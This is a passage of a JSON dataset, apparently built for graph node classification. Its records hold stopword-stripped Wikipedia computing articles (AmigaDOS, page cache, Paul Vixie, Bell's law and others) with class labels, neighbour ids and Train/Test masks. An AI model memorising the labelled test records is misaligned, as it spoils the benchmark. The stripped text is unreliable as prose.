    "text": "SocialFlow:socialflow socialflow social media optimization platform leading brands publishers company uses twitter firehose click data derived proprietary link proxy along proprietary algorithms optimize delivery messages social networks company believes understanding utilizing key metrics engagement clicks per tweet clicks per follower central growing large active social media following analysis data visualization way news filtered around death osama bin laden via twitter received international news coverage led questions role twitter journalism socialflow founded early 2009 frank speiser mike perrone sought apply scientific approach task building sustaining engaged social media audiences scale socialflow announced april 7 2011 raised 7 million series funding series round led softbank softbank ny rre ventures betaworks highline venture partners aol venture partners sv angel group high profile angel investors participating april 16 2013 socialflow announced raised 10 million round series b funding fairhaven capital led round joined existing investors softbank capital rre ventures aol ventures betaworks well new investors kbs+ ventures rand capital corporation company announced june 7 2011 peter hershberg joined company president socialflow gained considerable media attention published breaking bin laden visualizing power single tweet study demonstrated twitter evolved primary news source death osama bin laden broke twitter next study engaging news-hungry audiences tweet tweet looked twitter audiences al-jazeera english bbc news cnn economist fox news new york times revealed similarities differences respective organization audience simultaneously demonstrating true value audience engagement another notable study created socialflow looked launch kony 2012 video social media noted forbes writer anthony kosner study socialflow research group showed rather emerging big liberal enclaves american coasts initial wave social media traffic launched kony 2012 video originated mid-sized relatively conservative cities middle america",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 8366,
    "label": 5,
    "text": "Delayed_binding:delayed binding delayed binding also called tcp connection splicing postponement connection client server order obtain sufficient information make routing decision application switches routers delay binding client session server proper handshakes complete prevent denial-of-service attacks",
    "neighbors": [
      2409
    ],
    "mask": "Test"
  },
  {
    "node_id": 8367,
    "label": 3,
    "text": "Bell's_law_of_computer_classes:bell law computer classes bell law computer classes formulated gordon bell 1972 describes types computing systems referred computer classes form evolve may eventually die new classes computers create new applications resulting new markets new industries bell considers law partially corollary moore law states number transistors per chip double every 24 months unlike moore law new computer class usually based lower cost components fewer transistors less bits magnetic surface etc new class forms every decade also takes decade understand class formed evolved likely continue formed lower priced class may evolve performance take disrupt existing class evolution caused clusters scalable personal computers 1 thousands computers span price performance range use pc mainframes become largest supercomputers day scalable clusters became universal class beginning mid-1990s 2010 clusters least one million independent computers constitute world largest cluster established market class computers aka platforms introduced continue evolve roughly constant price subject learning curve cost reduction increasing functionality performance based moore law gives transistors per chip bits per unit area increased functionality per system roughly every decade technology advances semiconductors storage networks interfaces enable new lower cost computer class aka platform form serve new need enabled smaller devices e.g less transistors per chip less expensive storage displays i/o network unique interface people information processing sink source new lower priced class established maintained quasi independent industry market class likely evolve substitute existing class classes described computer clusters beginning 1990s single class scalable computers mega-servers built clusters tens thousands commodity microcomputer-storage-networked bricks began cover replace mainframes minis workstations become largest computers day applied scientific calculation commonly called supercomputer bell law computer classes class formation first mentioned 1970 introduction digital equipment pdp-11 mini differentiate mainframes potentially emerging micros law described 1972 gordon bell emergence observation new lower-priced microcomputer class based microprocessor stimulated creation law bell described articles bell books see also several laws e.g moore law metcalfe law describe computer industry",
    "neighbors": [
      2208,
      2273,
      6656,
      9732,
      5798,
      5802,
      78,
      1935,
      7248,
      785,
      1778,
      6801,
      153,
      1083,
      7006
    ],
    "mask": "Test"
  },
  {
    "node_id": 8368,
    "label": 4,
    "text": "SecurityFocus:securityfocus securityfocus online computer security news portal purveyor information security services home well-known bugtraq mailing list securityfocus columnists writers included former department justice cybercrime prosecutor mark rasch hacker-turned-journalist kevin poulsen securityfocus acquired symantec august 2002",
    "neighbors": [
      8960,
      899,
      653,
      7955,
      10132,
      535,
      10903,
      6297,
      5924,
      1708,
      6189,
      11184,
      1970,
      11065,
      3520,
      2378,
      8398,
      10959,
      4945,
      4435,
      9569,
      9317,
      10341,
      4071,
      2027,
      6643,
      10872,
      8572,
      2558,
      9983
    ],
    "mask": "None"
  },
  {
    "node_id": 8369,
    "label": 2,
    "text": "AmigaDOS:amigados amigados disk operating system amigaos includes file systems file directory manipulation command-line interface file redirection amigaos 1.x amigados based tripos port metacomco written bcpl bcpl use native pointers advanced functionality operating system difficult use error-prone third-party amigados resource project arp formerly amigados replacement project project begun amiga developer charlie heath replaced many bcpl utilities smaller sophisticated equivalents written c assembler provided wrapper library codice_1 eliminated interfacing problems applications automatically performing conversions native pointers used c assembler bcpl equivalents vice versa amigados functions amigaos 2.x onwards amigados rewritten c retaining 1.x compatibility possible starting amigaos 4 amigados abandoned legacy bcpl starting amigaos 4.1 amigados extended 64-bit file-access support amiga console standard amiga virtual device normally assigned con driven console.handler developed primitive interface amigaos 1.1 became stable versions 1.2 1.3 started known amigashell original handler replaced newconsole.handler newcon console various features considered date created 1985 like command template help redirection null nil ansi color terminal new console handler – implemented release 1.2 – allows many features command history pipelines automatic creation files output redirected tcp/ip stacks like amitcp released early 1990s console could also receive redirection internet-enabled amiga device handlers e.g. tcp copy file tcp site/port unlike systems originally launched mid-1980s amigados implement proprietary character set developers chose use ansi–iso standard iso-8859-1 latin 1 includes ascii character set unix systems amiga console accepts linefeed lf end-of-line eol character amiga console support accented characters well characters created combinations 'dead keys keyboard example typical amigados command syntax amigados redirect output command files pipes printer null device amiga devices amigados commands expected provide standard template describes arguments accept used basic help feature commands although third-party replacement console handlers shells bash zshell ported unix kingcon often provide verbose help built-in commands requesting template command copy following output obtained reading template user know following syntax acceptable command user terminate program invoking key combination pressing printing character keyboard suspends console output output may resumed pressing key delete input pressing cause input processed command soon current command stops running like operating systems amigados also provides wildcard characters substitutes character sequence random characters string example wildcard characters amigados commands parsing follows wildcard indicates character prefixing indicates number repetitions viewed analogous regular expression .* amigados also feature dealing batch programming calls script programming number commands echo endif val skip deal structured script programming scripts text-based files created amigados internal text editor program called ed unrelated unix ed third-party text editor invoke script program amigados uses command execute method executing scripts keeps console window busy script finished scheduled job users interact console window script ends interrupt protection bits flags files links directories filesystem change one either use command protect use information entry icons menu workbench selected files amigados supports following set protection bits abbreviated hsparwed h-bit often misunderstood mean hide smart file system sfs files directories h-bit set hidden system still possible access hidden files n't appear directory listings demonstration h-bit action dos amiga deals environment variables used batch programming global local variables referred dollar sign front variable name example myvar global variables available system-wide local variables valid current shell case name collision local variables precedence global variables global variables set using command setenv local variables set using command set also commands getenv get used print global local variables examples demonstrate simple usage global variables kept files env optionally saved disk envarc survive reboot power cycling env default assign ram env envarc assign sys prefs/env-archive sys refers boot device bootup content envarc copied env accessibility programming amigados scripts one must keep mind global variables system-wide script-internal variables shall set using local variables one risks conflicts global variables scripts also global variables require filesystem access typically makes slower access local variables since envarc also used store system settings string variables system settings default icons tends grow large time copying everything env located ram disk becomes expensive led alternative ways set env using dedicated ramdisk handlers copy files envarc files requested examples handlers example demonstrating creative abuse global variables well lab skip amigados variant infamous goto amigados general case-insensitive indicating device dh0 dh0 dh0 always refers partition however file directory names filesystem-dependent filesystems allow case sensitivity flag upon formatting example file system smart file system convenient dealing software ported mostly case-sensitive un*x world causes much confusion native amiga applications assume case insensitivity advanced users hence typically use case sensitivity flag file systems used software originating un*x note also re-casing file directory volume names allowed using ordinary methods commands rename foo foo relabel bar bar valid exactly expected contrast example linux mv foo foo results error message mv foo foo file case-insensitive filesystems like vfat partitions physical drives typically referred df0 floppy drive 0 dh0 hard drive 0 etc however unlike many operating systems outside built-in physical hardware devices like df0 hd0 names single disks volumes partitions totally arbitrary example hard disk partition could named work system anything else time creation volume names used place corresponding device names disk partition device dh0 called workbench could accessed either name dh0 workbench users must indicate system workbench volume workbench always typing colon entering information requester form amigashell accessed volume name found operating system prompt user insert disk given volume name allow user cancel operation addition logical device names set assign command directory device programs often assigned virtual volume name installation directory instance fictional wordprocessor called writer might assign writer dh0 productivity/writer allows easy relocation installed programs default name sys used refer volume system booted various default names provided refer important system locations e.g startup scripts c amigados commands fonts installed fonts etc assignment volume labels also set multiple directories treated union contents example fonts might assigned sys fonts extended include example work userfonts using add option amigados assign command system would permit use fonts installed either directory listing fonts would show files locations physical device df0 shares floppy drive mechanics pc0 crossdos virtual device capable reading pc formatted floppy disks pc formatted floppy disk inserted floppy drive df0 floppy amiga icon change indicate disk unknown normal amiga device show four question marks standard unknown volume name pc0 icon appear revealing name pc formatted disk disk change amiga formatted disks invert behaviour amigados supports various filesystems variants first filesystem simply called amiga filesystem suitable mainly floppy disks support automatic booting hard disks floppy booting done using code bootblock soon replaced fastfilesystem ffs hence original filesystem known name old filesystem ofs ffs efficient space quite measurably faster ofs hence name amigaos 2.x ffs became official part os soon expanded recognise cached partitions international partitions allowing accented characters file partition names finally morphos amigaos 4 long filenames 108 characters 31 amigaos 4.x morphos featured new version ffs called fastfilesystem 2 ffs2 incorporated features original ffs including author put minor changes order preserve backwards compatibility major structural changes however ff2 amigaos 4.1 differs expand features capabilities aid plug-ins ffs2 amigaos 4 morphos version smart filesystem fork original sfs 100 compatible filesystems like fat12 fat16 fat32 windows ext2 linux available easily installable drag drop system libraries third party modules fat95 features read/write support found aminet software repository morphos 2 built-in support fat filesystems amigaos 4.1 adopted new filesystem called jxfs capable support partitions terabyte size alternate filesystems third-party manufacturers include professional filesystem filesystem easy structure based metadata allowing high internal coherence capable defragmenting fly require unmounted mounted smart filesystem journaling filesystem performs journaled activities system inactivities chosen morphos standard filesystem old file system/fast file system fast file system 2 amigaos4.x/morphos dos6 dos7 feature international filenames featured dos2 do3 directory caching abandoned due bugs original implementation dos4 dos5 recommended use reason dostypes backwards compatible forward compatible dos7 formatted disk read original amiga ffs dos3 disk read ks1.3 amiga however disk formatted dos0 using ffs ffs2 read version amiga operating system reason dos0 tended format choice software developers distributing floppy except custom filesystem bootblock used common practice amiga games software needed amigaos 2 anyway dos3 generally used july 2007 update amigaos 4.0 2007 first two plug-ins ffs2 released amigados single mandated filename extension .info must appended filename icon file called myprog exists icon file must called myprog.info addition image data icon file also records program metadata options keywords position desktop amigaos snapshot icons places defined user information file directory window size position information stored .info file associated directory disk icon information stored disk.info root volume exception icons amiga system identify file types using extensions instead examine either icon associated file binary header file determine file type",
    "neighbors": [
      8832,
      139,
      655,
      5264,
      2193,
      9236,
      2197,
      5397,
      1561,
      8729,
      3233,
      9249,
      4387,
      9762,
      1193,
      8618,
      6062,
      432,
      8115,
      8499,
      823,
      6075,
      11076,
      1349,
      10570,
      5709,
      1742,
      9166,
      5969,
      850,
      6995,
      4564,
      8402,
      6233,
      477,
      5729,
      6498,
      1509,
      5736,
      11370,
      5359,
      5743,
      11123,
      5492,
      2933,
      9335,
      9848,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 8370,
    "label": 7,
    "text": "GUSE:guse grid cloud user support environment guse also known ws-pgrade web service – parallel grid run-time application development environment /guse open source science gateway framework enables users access grid cloud infrastructures guse developed laboratory parallel distributed systems lpds institute computer science control sztaki hungarian academy sciences relevant requirement development guse enable simultaneous handling large number jobs even range millions without compromising response time user interface order achieve level concurrency workflow management back-end guse implemented based web service concept service oriented architecture soa many user communities would like access several dcis transparent way ’ want learn peculiar features used dcis want concentrate scientific application using science gateway sg solution sg provides interface scientist community distributed computing infrastructures dcis sg framework like guse provides specific set enabling technologies well frontend backend services together build generic gateway sg frameworks specialized certain scientific area hence scientists many different areas use enabling technology guse provides required software stack develop sg frameworks sg instances provide simplified user interface highly tailored needs given scientific community typical examples enabling technologies web application containers tomcat glassfish etc portal web application frameworks liferay spring etc database management systems mysql etc workflow management systems guse moteur etc sgs varying goals general researchers use gateways focus scientific goals less assembling e-infrastructure required important goal make easier scientists use national computing storage resources creating using collaborative tools sharing data sg framework used national grid initiatives ngis support small user communities afford develop customized sg guse sg framework also provides two application programming interfaces apis namely application-specific module api remote api create application-specific sgs according needs different user communities guse provides ws-pgrade graphical user interface create execute workflows various distributed computing infrastructures dcis among many features main five capabilities guse follows 1 guse general-purpose sg framework users access twenty different dcis via dci bridge service six different data storage types http https gsiftp s3 sftp srm via data avenue service dci bridge data avenue developed part ws-pgrade/guse service stack also used independent services enabling use types gateways workflow systems 2 ws-pgrade/guse workflow-oriented system extends directed acyclic graph dag -based workflow concept advanced parameter sweep ps features special workflow nodes condition-dependent workflow execution workflow embedding support moreover guse extends concrete workflow concept concepts abstract workflow workflow instance template 3 ws-pgrade/guse supports development execution workflow-based applications users guse define applications workflows share applications among ex-porting internal application repository users import applications execute modify user space 4 guse supports fast development sg instances customization technology guse serve different needs according community requirements computational power complexity applications specificity user interface fit community needs meet terminology 5 important design aspect guse flexibility flexibility guse expressed main goal designing multitier architecture ws-pgrade/guse enable versatile access many different kinds dcis data storage different kinds user interfaces access technically performed dci bridge job submission service bottom within guse architectural layers via data avenue blacktop service independent service provided sztaki dci bridge web service-based application providing standard access various dcis connects dci plug-ins external dci resources user submits workflow job components submitted transparently various dci systems via dci bridge service using standard ogsa basic execution service 1.0 bes interface result access protocol technical details various dci systems totally hidden behind bes interface job description language bes standardized job submission description language jsdl dcis supported dci bridge following middle tier guse architecture contains high-level guse services workﬂow storage stores every piece information needed define workflow graph structure description input files pointers output files pointers executable code target dci workflow nodes except input files workflow local input files local output files created workflow execution stored file storage workﬂow interpreter responsible execution workflows stored workﬂow storage information system holds information users workflows running job status users ws-pgrade gateways work isolated workspace i.e. see workflows order enable collaboration among isolated users application repository stores ws-pgrade workflows one five possible stages physically five categories stored zip files five categories stored workflows follows collaboration among gateway users possible via categories top three-tier structure presentation tier provides ws-pgrade graphical user interface generic sg framework functionalities underlying services exposed users portlets residing liferay portlet container part ws-pgrade layer easily customized extended according needs sg instances derived guse next section introduces essential user-level elements ws-pgrade guse provides framework european sgs guse gives one underlying workflow development infrastructures great number research activities numerous eu fp7 projects ongoing eu- national projects guse",
    "neighbors": [
      5414,
      6042,
      1862,
      5654
    ],
    "mask": "Test"
  },
  {
    "node_id": 8371,
    "label": 3,
    "text": "Castlequest:castlequest castlequest known japan adventure/puzzle-hybrid video game developed published ascii corporation 1985 fm-7 pc-88 sharp x1 additional versions followed 1986 famicom msx subsequently released 1989 nes united states nexoft corporation sequel castle released 1985 msx sg-1000 systems though nes like game early example metroidvania genre object game navigate groken castle rescue princess margarita player push certain objects throughout game accomplish progress rooms prince advance next room aligning cement blocks honey jars candle cakes elevator controlling block rooms quite time consuming since prince open particular door stand door meaning open door jumping mid-air prince must also carry key matches color door intends open player navigate castle help map obtained first room he/she begins map provide player matrix 10x10 rooms highlight room princess located player must also avoid touching enemies like knights bishops wizards fire spirits attack cats phantom flowers family computer nes versions room wider screen display scrolls horizontally player moves different room sizes many adjustments room layouts made comparison msx version family computer version player starts 4 lives game supports famicom data recorder ascii turbo file peripherals saving loading game progress game reworked us nes release save/load feature removed nes 15-pin expansion port turbo file connects however player 50 instead 4 lives initially two magical fairies help another obvious difference msx nes/family computer versions player attack enemies sword dagger nes/family computer versions attack limited enemy must close player kill take place puts player risk killed enemy timing crucial prince dash retrieve weapon timely basis attacking wrong time prevent player launching another attack enemy right location attacked leading certain loss one life player scenario however relevant msx version since way eliminate enemy throw object force enemy climb escalator remain crushed ceiling",
    "neighbors": [
      9161,
      5762,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 8372,
    "label": 1,
    "text": "Base_Mérimée:base mérimée base mérimée french database monuments listed national significance history architecture art created 1978 placed online 1995 french ministry culture division architectural heritage database periodically updated database contains information derived first survey historic monuments made mérimée 1840 cultural heritage inventory specifically religious domestic agricultural educational military industrial architecture name refers writer prosper mérimée also second inspector-general historic monuments",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 8373,
    "label": 2,
    "text": "Paul_Vixie:paul vixie paul vixie american computer scientist whose technical contributions include domain name system dns protocol design procedure mechanisms achieve operational robustness dns implementations significant contributions open source software principles methodology also created launched first successful commercial anti-spam service authored standard unix system programs sends proxynet rtty vixie cron one point ran consulting business vixie enterprises vixie software engineer digital equipment corporation dec 1988 1993 left dec 1994 founded internet software consortium isc together rick adams carl malamud support bind software internet activities isc assumed new company internet systems consortium 2004 although isc operates f root name server vixie one point joined open root server network orsn project operated l root server 1995 cofounded palo alto internet exchange paix metromedia fiber network mfn bought 1999 served chief technology officer mfn abovenet later president paix 1998 cofounded mail abuse prevention system maps california non-profit company goal stopping email abuse vixie author several request comments rfc including best current practice document classless in-addr.arpa delegation bcp 20 unix software stated 2002 hold record 'most cert advisories due single author 2008 vixie served judge mozilla foundation download day attempt set guinness world record downloads single day new piece software vixie served board trustees american registry internet numbers arin 2005 2013 served chairman 2009 2010 vixie also serves security stability advisory committee icann vixie attended george washington high school san francisco california received ph.d. computer science keio university 2011 2013 nearly 20 years isc founded new company farsight security inc. spinning security business unit isc 2014 vixie inducted internet hall fame innovator",
    "neighbors": [
      1472,
      8224,
      4483,
      2887,
      7337,
      11659,
      8301,
      6352,
      850,
      914,
      3731,
      5492,
      9845,
      1495,
      472
    ],
    "mask": "Test"
  },
  {
    "node_id": 8374,
    "label": 2,
    "text": "Ebrima:ebrima ebrima opentype font designed support african writing systems created microsoft part windows 7 operating system supports advanced opentype features combining diacritics positioning latin alphabet based segoe font",
    "neighbors": [
      2593,
      4130,
      9539,
      7973,
      8422,
      4138,
      4141,
      6797,
      1487,
      3538,
      4146,
      4148,
      9654,
      4127
    ],
    "mask": "Test"
  },
  {
    "node_id": 8375,
    "label": 0,
    "text": "Australasian_Language_Technology_Association:australasian language technology association australasian language technology association alta promotes language technology research development australia new zealand alta organises regular events exchange research results academic industrial training co-ordinates activities professional societies alta founding regional organization asian federation natural language processing afnlp every year early december alta organises research workshop commonly known altw gathering together growing language technology community australia new zealand academic industrial world workshop welcomes original work aspect natural language processing including speech text accepted papers published alta proceedings also included part acl anthology since 2008 alta involved organising australian computational linguistics olympiad ozclo contest high school students area linguistics computational linguistics",
    "neighbors": [
      1890,
      7724
    ],
    "mask": "Test"
  },
  {
    "node_id": 8376,
    "label": 6,
    "text": "Acronis_Secure_Zone:acronis secure zone acronis secure zone hard disk partition type created used acronis true image ati backup storage target backup applications typically use network storage storing backup archives problematic resources available acronis designed solution problem carving part local disk proprietary partition refer acronis secure zone asz since partition accessibly true image backup recovery functions backup target safe malware user files uses corruption ati manage single asz per computer restore data aszs present e.g portable hard drive connected although acronis secure zone partition type actually rebadged fat32 partition labeled acronis sz partition type code set 0xbc knowing requirements one manually create and/or manage existing acronis secure zone using partition manager since asz actually modified fat32 partition type possible gain direct access partition changing partition type code 0x0b fat32 lba ati designed self-manage backup archives stored asz backup files stored autogenerated names root folder enough freespace next backup file ati automatically delete oldest image set base+incremental/differential files order create space new files oem versions true image designed use special oem secure zone technically regular asz uses partition type 0xbb typically contains single image file factory default os application configuration set forth manufacturer",
    "neighbors": [
      2107,
      3366
    ],
    "mask": "Test"
  },
  {
    "node_id": 8377,
    "label": 4,
    "text": "Spam_Bully:spam bully spam bully anti-spam software made axaware llc spambully uses bayesian filtering separate good emails spam emails also uses allow/block lists determine emails go user inbox popular features include ability report spammers providers ftc option converting spambully toolbar variety languages including spanish german italian russian",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 8378,
    "label": 2,
    "text": "Bcfg2:bcfg2 bcfg2 pronounced bee-config configuration management tool developed mathematics computer science division argonne national laboratory bcfg2 aids infrastructure management lifecycle – configuration analysis service deployment configuration auditing includes tools visualizing configuration information well reporting tools help administrators understand configuration patterns environments bcfg2 differs similar configuration management tools due auditing capability one stated design goals bcfg2 determine interactive direct changes made machine report extra changes client optionally remove additional configuration bcfg2 written python enables system administrator manage configuration large number computers using central configuration model bcfg2 operates using simple model system configuration modeling intuitive items like packages services configuration files well dependencies model system configuration used verification validation allowing robust auditing deployed systems bcfg2 configuration specification written using declarative xml model entire specification validated using widely available xml schema validators along custom schemas included bcfg2 built cross-platform bcfg2 works unix-like operating systems bcfg2 based client-server architecture client responsible interpreting processing configuration served server configuration literal client-side processing configuration required completion configuration process client uploads set statistics server bcfg2 client performs client configuration reconfiguration operations renders declarative configuration specification provided bcfg2 server set configuration operations attempt change client state described configuration specification operation bcfg2 client intended simple possible conceptually sole purpose client reconcile differences current client state state described specification received bcfg2 server bcfg2 server responsible taking network description turning series configuration specifications particular clients also manages probed data tracks statistics clients bcfg2 server takes information two sources generating client configuration specifications first pool metadata describes clients members aspect-based classing system clients defined terms aspects abstract behavior file system repository contains mappings metadata literal configuration combined form literal configuration specifications clients example abstract configuration entries example literal configuration entries",
    "neighbors": [
      9320,
      8554,
      5612,
      10222,
      7983,
      10641,
      5492,
      5397,
      823,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 8379,
    "label": 2,
    "text": "Page_cache:page cache computing page cache sometimes also called disk cache transparent cache pages originating secondary storage device hard disk drive hdd solid-state drive ssd operating system keeps page cache otherwise unused portions main memory ram resulting quicker access contents cached pages overall performance improvements page cache implemented kernels paging memory management mostly transparent applications usually physical memory directly allocated applications used operating system page cache since memory would otherwise idle easily reclaimed applications request generally associated performance penalty operating system might even report memory free available compared main memory hard disk drive read/writes slow random accesses require expensive disk seeks result larger amounts main memory bring performance improvements data cached memory separate disk caching provided hardware side dedicated ram nvram chips located either disk controller case cache integrated hard disk drive usually called disk buffer disk array controller memory confused page cache pages page cache modified brought called dirty pages since non-dirty pages page cache identical copies secondary storage e.g hard disk drive solid-state drive discarding reusing space much quicker paging application memory often preferred flushing dirty pages secondary storage reusing space executable binaries applications libraries also typically accessed page cache mapped individual process spaces using virtual memory done mmap system call unix-like operating systems means binary files shared separate processes also unused parts binaries flushed main memory eventually leading memory conservation since cached pages easily evicted re-used operating systems notably windows nt even report page cache usage available memory memory actually allocated disk pages led confusion utilization page cache windows page cache also aids writing disk pages main memory modified writing data disk marked dirty flushed disk freed file write occurs cached page particular block looked already found page cache write done page main memory found page cache write perfectly falls page size boundaries page even read disk allocated immediately marked dirty otherwise page fetched disk requested modifications done file created opened page cache written might result zero byte file later read however cached pages written program code often mapped read-only copy-on-write latter case modifications code visible process written disk 2019 security researchers demonstrated side-channel attacks page cache possible bypass privilege separation exfiltrate data processes systematically monitoring whether file pages example executable library files present cache",
    "neighbors": [
      5120,
      8195,
      8976,
      11539,
      8344,
      2339,
      4389,
      7983,
      7728,
      819,
      4423,
      2250,
      5840,
      1109,
      86,
      4565,
      5206,
      1509,
      10091,
      8684,
      8301,
      2804,
      890,
      6014,
      9343
    ],
    "mask": "Train"
  },
  {
    "node_id": 8380,
    "label": 6,
    "text": "Non-Volatile_File_System:non-volatile file system non-volatile file system nvfs flash memory file system introduced release palm personal digital assistant handheld models tungsten t5 tungsten e2 palm tx z22 treo 650/700/680/755p palm centro nvfs claimed palmone file system designed keep information safe battery run power previous non-flash memory designs would lose stored data event power loss nvfs derivative flash memory continually stores data even power applied palmone invented nvfs response complaints handheld data destroyed battery power ran past necessary keep handheld continuously charged avoid losing data since information stored volatile memory similar feature adopted pdas running windows mobile 5.0 operating system named persistent storage nvfs uses nand flash memory technology retain handheld data event battery swap battery runs power palmone claims flash memory plus majority consumers since many want charge handheld often consumes less overall power nvfs uses brand-new data architecture might render incompatible applications ran well non-nvfs handhelds nvfs file system designed use clusters 512 byte blocks power users complained files take approximately 33 space volatile file systems fact volatile file system uses block size 14 bytes compared nvfs file system minimum block size 512 bytes palmone responded complaint offering free 128 megabyte sd card request selected customers nvfs early release palm time palmone would commit work rom flash update reduce overhead nvfs architecture currently palm-branded products using nvfs shipped nvfs fix already installed tungsten e2 uses 4kb blocks recommended earlier versions palm treo 650 tungsten t5 install nvfs fix earliest possible convenience controversy gave tungsten t5 treo 650 unfavorable remarks power users palmone released first sprint treo 650 updater designed ensure block size overhead reduced 512 bytes 16-32 bytes usually 32 bytes low 16 bytes depending file demand resulting drastic memory management efficiency improvements nvfs file system second update sprint treo 650 released june 16 2005 unlocked gsm firmware upgrade also released day second sprint treo 650 firmware update also improves efficiency nvfs file system addition addressing known problems prior release firmware update rogers wireless treo 650 firmware update quietly posted rogers wireless treo 650 support site shares bug fixes nvfs memory efficiency updates unlocked gsm version initial release palmone tungsten e2 verizon wireless treo 650 earthlink wireless treo 650 already nvfs memory system problems assessed according palm info center june 22 2005 palmone tungsten t5 version 1.1 update fixes nvfs file system inefficiency problem since release november 2004 version 1.1 update also updates tungsten t5 version number garnet 5.4.8 july 25 2005 cingular treo 650 fix officially released one fixes addressing inefficiency problems associated nvfs file system cingular treo 650 holders encouraged deploy flash rom update earliest time possible",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 8381,
    "label": 4,
    "text": "Mark_Weatherford:mark weatherford mark weatherford american cybersecurity professional held variety executive level positions public private sectors appointed first deputy secretary cybersecurity us department homeland security 2011 2013 currently global information security strategist booking holdings weatherford graduate university arizona tucson arizona received master degree naval postgraduate school monterey california holds certified information systems security professional cissp certification former us navy cryptologic officer led navy ’ computer network defense operations naval computer incident response team navcirt joining dhs served 2010–11 vice president chief security officer north american electric reliability corporation nerc directed organization ’ critical infrastructure cybersecurity program electric utilities across north america also appointed governor arnold schwarzenegger state california first chief information security officer office information security 2008–09 also first chief information security officer ciso state colorado 2004–07 appointed governor bill owens governor bill ritter notably helped establish state ’ first cybersecurity program spearheaded nation first cybersecurity legislation aimed protect citizens leaving dhs principal chertoff group washington dc senior vice president chief cybersecurity strategist varmour weatherford one information security magazine ’ security 7 award winners 2008 awarded sc magazine cso year award 2010 2012 2013 named one 10 influential people government information security govinfosecurity member marysville high school marysville california hall fame inducted information systems security association issa international hall fame october 2018",
    "neighbors": [
      10307
    ],
    "mask": "None"
  },
  {
    "node_id": 8382,
    "label": 9,
    "text": "Assignment_operator_(C++):assignment operator c++ c++ programming language assignment operator codice_1 operator used assignment like operators c++ overloaded copy assignment operator often called assignment operator special case assignment operator source right-hand side destination left-hand side class type one special member functions means default version generated automatically compiler programmer declare one default version performs memberwise copy member copied copy assignment operator may also programmer-declared compiler-generated copy assignment operator differs copy constructor must clean data members assignment target correctly handle self-assignment whereas copy constructor assigns values uninitialized data members example language permits overloaded assignment operator arbitrary return type including codice_2 however operator usually defined return reference assignee consistent behavior assignment operator built-in types returning assigned value allows using operator invocation expression instance control statements chained assignment also c++ standard library requires behavior user-supplied types deep copies objects made exception safety taken consideration one way achieve resource deallocation never fails however no-fail no-throw swap function available member subobjects class provides copy constructor destructor according rule three straightforward way implement copy assignment follows c++ supports assignment different classes via implicit copy constructor assignment operator destination instance class ancestor source instance class copying ancestor descendant objects could leave descendant fields uninitialized permitted",
    "neighbors": [
      8262,
      6527,
      6160,
      1236,
      10143
    ],
    "mask": "Train"
  },
  {
    "node_id": 8383,
    "label": 3,
    "text": "List_of_devices_using_Mediatek_tablet_processors:list devices using mediatek tablet processors page contains list every major device using mediatek tablet processor organized chip devices uses section begin=header symtab25",
    "neighbors": [
      7170,
      8720,
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      8237,
      9774,
      8250,
      8253,
      7745,
      7235,
      7747,
      2635,
      99,
      8812,
      11374,
      10361,
      638,
      644,
      8842,
      146,
      659,
      1170,
      7833,
      666,
      5786,
      4258,
      4773,
      9913,
      10945,
      9928,
      2788,
      3301,
      9964,
      6391,
      3835,
      781,
      2838,
      5417,
      7988,
      10548,
      11062,
      1849,
      6971,
      10562,
      8003,
      6981,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      373,
      8058,
      392,
      1428,
      5028,
      7077,
      9638,
      3511,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      4569,
      2524,
      9182,
      1014,
      3575
    ],
    "mask": "Test"
  },
  {
    "node_id": 8384,
    "label": 9,
    "text": "Highcharts:highcharts highcharts software library charting written pure javascript first released 2009 created highsoft vik norway regularly featured national media finansavisen dagsrevyen torstein hønsi main creator product product first demonstrated thought 2006 interview finansavisen spoke need program creating graphs charts allowing users publish charts directly website unlike many software products n't developed well known tech location silicon valley company based small norwegian town vik company based norway product used globally stated interview 2014 customer base primarily abroad 97 company revenue generated clients outside norway highchart products featured norwegian tv late 2012 parent company featured national tv show segment middle 30-minute show dagsrevyen highcharts free non-commercial use licenses needed use commercial applications source code highcharts downloaded modified license",
    "neighbors": [
      803,
      1211,
      3462,
      5846
    ],
    "mask": "None"
  },
  {
    "node_id": 8385,
    "label": 9,
